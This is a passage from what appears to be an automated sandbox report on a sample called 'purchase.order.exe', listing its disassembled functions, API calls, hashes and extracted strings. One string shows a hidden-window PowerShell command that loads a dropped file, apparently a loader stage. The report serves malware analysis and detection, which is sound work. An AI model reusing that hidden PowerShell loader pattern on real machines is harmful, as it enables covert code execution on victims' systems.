                                          • Snapshot File: hcaresult_0_2_400000_purchase.jbxd
                                          Similarity
                                          • API ID: FilePointer
                                          • String ID:
                                          • API String ID: 973152223-0
                                          • Opcode ID: 9851be0de28bb9513f6e500a0df6ea838ed72b99fd7baa621d8f85bec57c8f40
                                          • Instruction ID: 1f5c7ae16c2334422adcad36111bde95194575cbdac9b1f52e29a9f6e91cc98e
                                          • Opcode Fuzzy Hash: 9851be0de28bb9513f6e500a0df6ea838ed72b99fd7baa621d8f85bec57c8f40
                                          • Instruction Fuzzy Hash: 34B01271240300BFDA214F00DF09F057B21ABA0700F10C034B388380F086711035EB0D
                                          Function 004044F5 Relevance: 1.5, APIs: 1, Instructions: 6windowCOMMON
                                          Download Yara Rule
                                          APIs
                                          • SendMessageW.USER32(00000028,?,00000001,00404320), ref: 00404503
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1473809836.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1473750419.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1473836494.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1473857959.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1473857959.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1473857959.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1473857959.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1473857959.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1473857959.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1473857959.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1473857959.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1473857959.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1474076538.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_purchase.jbxd
                                          Similarity
                                          • API ID: MessageSend
                                          • String ID:
                                          • API String ID: 3850602802-0
                                          • Opcode ID: 0b5dc737e690c2697fce459c5807109f7a0ee7b6821d5e504b87bae23edcb368
                                          • Instruction ID: a1e91a2b22b377b77c28deac9acb262fc7b3ebada01c3a2f9bc193e64980b6bc
                                          • Opcode Fuzzy Hash: 0b5dc737e690c2697fce459c5807109f7a0ee7b6821d5e504b87bae23edcb368
                                          • Instruction Fuzzy Hash: E9B09236690A40AADA215B00DE09F867B62A7A8701F008438B240640B0CAB204A1DB08
                                          Function 004044E2 Relevance: 1.5, APIs: 1, Instructions: 4COMMON
                                          Download Yara Rule
                                          APIs
                                          • KiUserCallbackDispatcher.NTDLL(?,004042B9), ref: 004044EC
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1473809836.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1473750419.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1473836494.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1473857959.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1473857959.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1473857959.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1473857959.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1473857959.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1473857959.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1473857959.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1473857959.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1473857959.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1474076538.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_purchase.jbxd
                                          Similarity
                                          • API ID: CallbackDispatcherUser
                                          • String ID:
                                          • API String ID: 2492992576-0
                                          • Opcode ID: 1338f86397f00e2d38996c3f1ae94053e56d426343b35a23e1e428530b57d47f
                                          • Instruction ID: bf70c606a766814dc6d2ff6c1013b69bc1ca18b78975ad7518874070628387b3
                                          • Opcode Fuzzy Hash: 1338f86397f00e2d38996c3f1ae94053e56d426343b35a23e1e428530b57d47f
                                          • Instruction Fuzzy Hash: BEA00176544900ABCA16AB50EF0980ABB72BBA8701B528879A285510388B725921FB19
                                          Function 00401FC9 Relevance: 1.3, APIs: 1, Instructions: 37COMMON
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 004055C6: lstrlenW.KERNEL32(daniglacial,00000000,00418EC0,00000000,?,?,?,?,?,?,?,?,?,00403412,00000000,?), ref: 004055FE
                                            • Part of subcall function 004055C6: lstrlenW.KERNEL32(00403412,daniglacial,00000000,00418EC0,00000000,?,?,?,?,?,?,?,?,?,00403412,00000000), ref: 0040560E
                                            • Part of subcall function 004055C6: lstrcatW.KERNEL32(daniglacial,00403412,00403412,daniglacial,00000000,00418EC0,00000000), ref: 00405621
                                            • Part of subcall function 004055C6: SetWindowTextW.USER32(daniglacial,daniglacial), ref: 00405633
                                            • Part of subcall function 004055C6: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405659
                                            • Part of subcall function 004055C6: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405673
                                            • Part of subcall function 004055C6: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405681
                                            • Part of subcall function 00405B24: CreateProcessW.KERNELBASE(00000000,0042C800,00000000,00000000,00000000,04000000,00000000,00000000,00425F10,?,?,?,0042C800,?), ref: 00405B4D
                                            • Part of subcall function 00405B24: CloseHandle.KERNEL32(?,?,?,0042C800,?), ref: 00405B5A
                                          • CloseHandle.KERNEL32(?,?,?,?,?,?), ref: 00402010
                                            • Part of subcall function 004069E0: WaitForSingleObject.KERNEL32(?,00000064), ref: 004069F1
                                            • Part of subcall function 004069E0: GetExitCodeProcess.KERNEL32(?,?), ref: 00406A13
                                            • Part of subcall function 00406488: wsprintfW.USER32 ref: 00406495
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1473809836.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1473750419.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1473836494.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1473857959.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1473857959.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1473857959.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1473857959.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1473857959.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1473857959.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1473857959.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1473857959.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1473857959.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1474076538.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_purchase.jbxd
                                          Similarity
                                          • API ID: MessageSend$CloseHandleProcesslstrlen$CodeCreateExitObjectSingleTextWaitWindowlstrcatwsprintf
                                          • String ID:
                                          • API String ID: 2972824698-0
                                          • Opcode ID: 1c7c1930723d4ccd5ae5bb4616c40caea24dbe794e3428a6cec7ded8fab62b7a
                                          • Instruction ID: 2b527fce213089fa12a92f7baeb69a5519dacc7bd52e038cdd259e112745fe09
                                          • Opcode Fuzzy Hash: 1c7c1930723d4ccd5ae5bb4616c40caea24dbe794e3428a6cec7ded8fab62b7a
                                          • Instruction Fuzzy Hash: D0F09632904611ABDF30BBA59A895DF76B49F0035CF21413FE202B25D5C6BD4E41E76E

                                          Non-executed Functions

                                          Function 004049B1 Relevance: 24.8, APIs: 10, Strings: 4, Instructions: 275stringCOMMON
                                          Download Yara Rule
                                          APIs
                                          • GetDlgItem.USER32(?,000003FB), ref: 00404A00
                                          • SetWindowTextW.USER32(00000000,?), ref: 00404A2A
                                          • SHBrowseForFolderW.SHELL32(?), ref: 00404ADB
                                          • CoTaskMemFree.OLE32(00000000), ref: 00404AE6
                                          • lstrcmpiW.KERNEL32(: Completed,00422F08,00000000,?,?), ref: 00404B18
                                          • lstrcatW.KERNEL32(?,: Completed), ref: 00404B24
                                          • SetDlgItemTextW.USER32(?,000003FB,?), ref: 00404B36
                                            • Part of subcall function 00405B85: GetDlgItemTextW.USER32(?,?,00000400,00404B6D), ref: 00405B98
                                            • Part of subcall function 004067EF: CharNextW.USER32(?,*?|<>/":,00000000,"C:\Users\user\Desktop\purchase.order.exe",774D3420,C:\Users\user\AppData\Local\Temp\,00000000,004034F7,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403806,?,00000008,0000000A,0000000C), ref: 00406852
                                            • Part of subcall function 004067EF: CharNextW.USER32(?,?,?,00000000,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00406861
                                            • Part of subcall function 004067EF: CharNextW.USER32(?,"C:\Users\user\Desktop\purchase.order.exe",774D3420,C:\Users\user\AppData\Local\Temp\,00000000,004034F7,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403806,?,00000008,0000000A,0000000C), ref: 00406866
                                            • Part of subcall function 004067EF: CharPrevW.USER32(?,?,774D3420,C:\Users\user\AppData\Local\Temp\,00000000,004034F7,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403806,?,00000008,0000000A,0000000C), ref: 00406879
                                          • GetDiskFreeSpaceW.KERNEL32(00420ED8,?,?,0000040F,?,00420ED8,00420ED8,?,00000001,00420ED8,?,?,000003FB,?), ref: 00404BF9
                                          • MulDiv.KERNEL32(?,0000040F,00000400), ref: 00404C14
                                            • Part of subcall function 00404D6D: lstrlenW.KERNEL32(00422F08,00422F08,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404E0E
                                            • Part of subcall function 00404D6D: wsprintfW.USER32 ref: 00404E17
                                            • Part of subcall function 00404D6D: SetDlgItemTextW.USER32(?,00422F08), ref: 00404E2A
                                          Strings
                                          • C:\Users\user\AppData\Local\Temp\Blankbook85\patchworkenes\resprmiernes, xrefs: 00404B01
                                          • A, xrefs: 00404AD4
                                          • powershell.exe -windowstyle hidden "$Unsolaced207=gc -raw 'C:\Users\user\AppData\Local\Temp\Blankbook85\patchworkenes\resprmiernes, xrefs: 004049CA
                                          • : Completed, xrefs: 00404B12, 00404B17, 00404B22
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1473809836.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1473750419.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1473836494.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1473857959.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1473857959.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1473857959.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1473857959.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1473857959.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1473857959.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1473857959.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1473857959.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1473857959.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1474076538.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_purchase.jbxd
                                          Similarity
                                          • API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpilstrlenwsprintf
                                          • String ID: : Completed$A$C:\Users\user\AppData\Local\Temp\Blankbook85\patchworkenes\resprmiernes$powershell.exe -windowstyle hidden "$Unsolaced207=gc -raw 'C:\Users\user\AppData\Local\Temp\Blankbook85\patchworkenes\resprmiernes
                                          • API String ID: 2624150263-3873935440
                                          • Opcode ID: 935987cb4f9461c6069e20587a72eda96bebf85d42a230f0735d58c75f334840
                                          • Instruction ID: bc895223e5afc39127eca44d4d62e4eac8fcc33aadfc8ea3f63fda85b43113f0
                                          • Opcode Fuzzy Hash: 935987cb4f9461c6069e20587a72eda96bebf85d42a230f0735d58c75f334840
                                          • Instruction Fuzzy Hash: 15A190B1A01208ABDB11DFA6DD45AAFB7B8EF84304F11403BF611B62D1D77C9A418B6D
                                          Function 00405C4D Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 148filestringCOMMON
                                          Download Yara Rule
                                          APIs
                                          • DeleteFileW.KERNEL32(?,?,774D3420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\purchase.order.exe"), ref: 00405C76
                                          • lstrcatW.KERNEL32(00424F10,\*.*,00424F10,?,?,774D3420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\purchase.order.exe"), ref: 00405CBE
                                          • lstrcatW.KERNEL32(?,0040A014,?,00424F10,?,?,774D3420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\purchase.order.exe"), ref: 00405CE1
                                          • lstrlenW.KERNEL32(?,?,0040A014,?,00424F10,?,?,774D3420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\purchase.order.exe"), ref: 00405CE7
                                          • FindFirstFileW.KERNEL32(00424F10,?,?,?,0040A014,?,00424F10,?,?,774D3420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\purchase.order.exe"), ref: 00405CF7
                                          • FindNextFileW.KERNEL32(00000000,00000010,000000F2,?,?,?,?,0000002E), ref: 00405D97
                                          • FindClose.KERNEL32(00000000), ref: 00405DA6
                                          Strings
                                          • \*.*, xrefs: 00405CB8
                                          • C:\Users\user\AppData\Local\Temp\, xrefs: 00405C5A
                                          • "C:\Users\user\Desktop\purchase.order.exe", xrefs: 00405C56
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1473809836.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1473750419.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1473836494.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1473857959.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1473857959.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1473857959.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1473857959.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1473857959.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1473857959.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1473857959.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1473857959.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1473857959.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1474076538.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_purchase.jbxd
                                          Similarity
                                          • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                          • String ID: "C:\Users\user\Desktop\purchase.order.exe"$C:\Users\user\AppData\Local\Temp\$\*.*
                                          • API String ID: 2035342205-3719428342
                                          • Opcode ID: a58a7e6cf5cd5b323d99b2e7efe97abcbadf979a8ae7158d9cb99184f307206c
                                          • Instruction ID: c1737a7785d2a2f908f5f44de07c4aee1227101a85bdbc8c56ed50a571596083
                                          • Opcode Fuzzy Hash: a58a7e6cf5cd5b323d99b2e7efe97abcbadf979a8ae7158d9cb99184f307206c
                                          • Instruction Fuzzy Hash: 3241C430800A14BADB216B65CD4DABF7678DF41758F14813BF802B21D1D77C4AC19EAE
                                          Function 004021CF Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 129comCOMMON
                                          Download Yara Rule
                                          APIs
                                          • CoCreateInstance.OLE32(004084DC,?,00000001,004084CC,?,?,00000045,000000CD,00000002,000000DF,000000F0), ref: 0040224E
                                          Strings
                                          • C:\Users\user\AppData\Local\Temp\Blankbook85\patchworkenes\resprmiernes\Databehandlende\Tilsmil, xrefs: 0040228E
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1473809836.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1473750419.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1473836494.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1473857959.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1473857959.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1473857959.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1473857959.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1473857959.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1473857959.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1473857959.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1473857959.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1473857959.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1474076538.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_purchase.jbxd
                                          Similarity
                                          • API ID: CreateInstance
                                          • String ID: C:\Users\user\AppData\Local\Temp\Blankbook85\patchworkenes\resprmiernes\Databehandlende\Tilsmil
                                          • API String ID: 542301482-3069811719
                                          • Opcode ID: 5b87d2b53e3a3be9ffe6b0ca134cc9b512e0d8dbe994290f8d28894833e6dd44
                                          • Instruction ID: 7c9e104ca8be0d6b13ead4f97a80eb64338f0e545dbf3bddd9310e0b0504cb73
                                          • Opcode Fuzzy Hash: 5b87d2b53e3a3be9ffe6b0ca134cc9b512e0d8dbe994290f8d28894833e6dd44
                                          • Instruction Fuzzy Hash: 54410575A00209AFCB00DFE4CA89AAD7BB5FF48318B20457EF505EB2D1DB799981CB54
                                          Function 00402930 Relevance: 1.5, APIs: 1, Instructions: 30fileCOMMON
                                          Download Yara Rule
                                          APIs
                                          • FindFirstFileW.KERNEL32(00000000,?,00000002), ref: 0040293F
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1473809836.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1473750419.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1473836494.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1473857959.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1473857959.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1473857959.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1473857959.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1473857959.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1473857959.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1473857959.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1473857959.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1473857959.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1474076538.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_purchase.jbxd
                                          Similarity
                                          • API ID: FileFindFirst
                                          • String ID:
                                          • API String ID: 1974802433-0
                                          • Opcode ID: 5c150b9f35e6888bd535d4e9fbf2716058c991f00cae5ba87575c81c5c1b4e41
                                          • Instruction ID: 9ac6bcba1e22606d8a3f98507846f809c14ae5b1cd4137618ecf9cbbc0e374ac
                                          • Opcode Fuzzy Hash: 5c150b9f35e6888bd535d4e9fbf2716058c991f00cae5ba87575c81c5c1b4e41
                                          • Instruction Fuzzy Hash: D6F08C71A04115AFD710EBA4DA499AEB378EF14328F6001BBE116F31E5D7B88E419B29
                                          Function 00404F2D Relevance: 63.5, APIs: 33, Strings: 3, Instructions: 489windowmemoryCOMMON
                                          Download Yara Rule
                                          APIs
                                          • GetDlgItem.USER32(?,000003F9), ref: 00404F45
                                          • GetDlgItem.USER32(?,00000408), ref: 00404F50
                                          • GlobalAlloc.KERNEL32(00000040,?), ref: 00404F9A
                                          • LoadImageW.USER32(0000006E,00000000,00000000,00000000,00000000), ref: 00404FB1
                                          • SetWindowLongW.USER32(?,000000FC,0040553A), ref: 00404FCA
                                          • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404FDE
                                          • ImageList_AddMasked.COMCTL32(00000000,00000000,00FF00FF), ref: 00404FF0
                                          • SendMessageW.USER32(?,00001109,00000002), ref: 00405006
                                          • SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 00405012
                                          • SendMessageW.USER32(?,0000111B,00000010,00000000), ref: 00405024
                                          • DeleteObject.GDI32(00000000), ref: 00405027
                                          • SendMessageW.USER32(?,00000143,00000000,00000000), ref: 00405052
                                          • SendMessageW.USER32(?,00000151,00000000,00000000), ref: 0040505E
                                          • SendMessageW.USER32(?,00001132,00000000,?), ref: 004050F9
                                          • SendMessageW.USER32(?,0000110A,00000003,00000110), ref: 00405129
                                            • Part of subcall function 004044F5: SendMessageW.USER32(00000028,?,00000001,00404320), ref: 00404503
                                          • SendMessageW.USER32(?,00001132,00000000,?), ref: 0040513D
                                          • GetWindowLongW.USER32(?,000000F0), ref: 0040516B
                                          • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00405179
                                          • ShowWindow.USER32(?,00000005), ref: 00405189
                                          • SendMessageW.USER32(?,00000419,00000000,?), ref: 00405284
                                          • SendMessageW.USER32(?,00000147,00000000,00000000), ref: 004052E9
                                          • SendMessageW.USER32(?,00000150,00000000,00000000), ref: 004052FE
                                          • SendMessageW.USER32(?,00000420,00000000,00000020), ref: 00405322
                                          • SendMessageW.USER32(?,00000200,00000000,00000000), ref: 00405342
                                          • ImageList_Destroy.COMCTL32(00000000), ref: 00405357
                                          • GlobalFree.KERNEL32(00000000), ref: 00405367
                                          • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 004053E0
                                          • SendMessageW.USER32(?,00001102,?,?), ref: 00405489
                                          • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 00405498
                                          • InvalidateRect.USER32(?,00000000,00000001), ref: 004054C3
                                          • ShowWindow.USER32(?,00000000), ref: 00405511
                                          • GetDlgItem.USER32(?,000003FE), ref: 0040551C
                                          • ShowWindow.USER32(00000000), ref: 00405523
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1473809836.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1473750419.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1473836494.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1473857959.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1473857959.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1473857959.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1473857959.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1473857959.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1473857959.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1473857959.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1473857959.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1473857959.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1474076538.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_purchase.jbxd
                                          Similarity
                                          • API ID: MessageSend$Window$Image$ItemList_LongShow$Global$AllocCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                          • String ID: $M$N
                                          • API String ID: 2564846305-813528018
                                          • Opcode ID: a09e9907cf1d85342395cb53904611de706c132920ab67d22d4dedafd93240b8
                                          • Instruction ID: 4e4e2263315175f506fe38719dbb0ef9e1096acd748b53dfdf66ec3fe5014b92
                                          • Opcode Fuzzy Hash: a09e9907cf1d85342395cb53904611de706c132920ab67d22d4dedafd93240b8
                                          • Instruction Fuzzy Hash: BA029C70A00608AFDB20DF64DD45AAF7BB5FB44314F10817AE610BA2E1D7B98A42DF18
                                          Function 0040467F Relevance: 37.0, APIs: 19, Strings: 2, Instructions: 204windowstringCOMMON
                                          Download Yara Rule
                                          APIs
                                          • CheckDlgButton.USER32(?,-0000040A,00000001), ref: 0040471D
                                          • GetDlgItem.USER32(?,000003E8), ref: 00404731
                                          • SendMessageW.USER32(00000000,0000045B,00000001,00000000), ref: 0040474E
                                          • GetSysColor.USER32(?), ref: 0040475F
                                          • SendMessageW.USER32(00000000,00000443,00000000,?), ref: 0040476D
                                          • SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 0040477B
                                          • lstrlenW.KERNEL32(?), ref: 00404780
                                          • SendMessageW.USER32(00000000,00000435,00000000,00000000), ref: 0040478D
                                          • SendMessageW.USER32(00000000,00000449,00000110,00000110), ref: 004047A2
                                          • GetDlgItem.USER32(?,0000040A), ref: 004047FB
                                          • SendMessageW.USER32(00000000), ref: 00404802
                                          • GetDlgItem.USER32(?,000003E8), ref: 0040482D
                                          • SendMessageW.USER32(00000000,0000044B,00000000,00000201), ref: 00404870
                                          • LoadCursorW.USER32(00000000,00007F02), ref: 0040487E
                                          • SetCursor.USER32(00000000), ref: 00404881
                                          • LoadCursorW.USER32(00000000,00007F00), ref: 0040489A
                                          • SetCursor.USER32(00000000), ref: 0040489D
                                          • SendMessageW.USER32(00000111,00000001,00000000), ref: 004048CC
                                          • SendMessageW.USER32(00000010,00000000,00000000), ref: 004048DE
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1473809836.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1473750419.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1473836494.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
